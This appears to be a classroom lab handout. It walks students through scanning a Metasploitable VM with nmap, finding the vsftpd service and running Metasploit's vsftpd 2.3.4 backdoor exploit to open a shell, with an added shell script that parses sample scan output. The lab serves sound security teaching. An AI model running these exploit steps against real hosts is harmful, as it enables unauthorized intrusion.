Ensure that both the Kali and the Metasploitable machines are powered on and on the same network. Verify connectivity between them by using the ping command.
-
Run nmap against the Metasploitable machine using the following command.
-
sudo nmap -sV <metasploitable IP> -vvv
-
Make note of open ports and services.
-
Make note of which port the VSFTPD service is running on.
-
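An added example, not part of the original lab handout: a shell helper for the two note-taking steps above, which lists the open ports from `nmap -sV` output and reports the port and version of any vsftpd service. The sample scan text, the placeholder address 192.0.2.10 and the function names are constructed for illustration; 2.3.4 is the version named in the module path used later in this lab.

```shell
#!/bin/sh
# Constructed sample of `nmap -sV -vvv` output (not captured from a real host).
# 192.0.2.10 is a documentation-range placeholder address.
SAMPLE_SCAN='Discovered open port 21/tcp on 192.0.2.10
Nmap scan report for 192.0.2.10
PORT     STATE    SERVICE REASON         VERSION
21/tcp   open     ftp     syn-ack ttl 64 vsftpd 2.3.4
22/tcp   open     ssh     syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   filtered telnet  no-response
80/tcp   open     http    syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) DAV/2)'

# Print "port/proto service" for every row whose STATE column is exactly "open".
# Matching on the port/proto field skips the "Discovered open port" progress
# lines and the header row that verbose output contains.
open_ports() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" { print $1, $3 }'
}

# Print "port version" for each open port whose version banner names vsftpd.
# The banner is found by keyword, so the REASON column that verbose mode
# adds does not shift the result.
vsftpd_service() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
        for (i = 4; i < NF; i++)
            if (tolower($i) == "vsftpd") {
                split($1, p, "/")
                print p[1], $(i + 1)
                next
            }
    }'
}

# Print the port and return 0 when the scan shows vsftpd at the version in $1;
# return 1 when no such service is present.
has_vsftpd_version() {
    vsftpd_service | awk -v want="$1" '$2 == want { print $1; found = 1 }
                                       END { exit !found }'
}

# Demonstration on the constructed sample.
printf '%s\n' "$SAMPLE_SCAN" | open_ports
printf '%s\n' "$SAMPLE_SCAN" | vsftpd_service
```

To use it on a real scan, save the nmap output to a file and redirect that file into `open_ports` or `vsftpd_service` instead of the sample variable.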
-
Start the Kali PostgreSQL service (which Metasploit uses as its backend) by running the following command.
sudo systemctl start postgresql
-
Initialize the Metasploit PostgreSQL database by running the following command.
sudo msfdb init
-
Launch msfconsole by running the following command.
msfconsole
-
Check the database connectivity using the following command.
db_status
(It should say connected.)
-
Explore the search command by typing "help search".
-
Search for a VSFTPD exploit.
search type:exploit name:vsftp
-
How many exploits were found?
-
Select the found exploit by typing the following command.
use exploit/unix/ftp/vsftpd_234_backdoor
-
Review the options of the exploit by typing the following command.
show options
-
Set the remote host and port by using the following commands.
-
set RHOSTS <Metasploitable IP Address>
-
set RPORT <VSFTPD port number>
-
-
Verify what payloads are available by using the "show payloads" command.
-
How many payloads are available?
-
Run the exploit by using the following command.
exploit
-
Once the shell is opened, type the following commands, one after the other.
hostname
ifconfig
Include a screenshot of the output.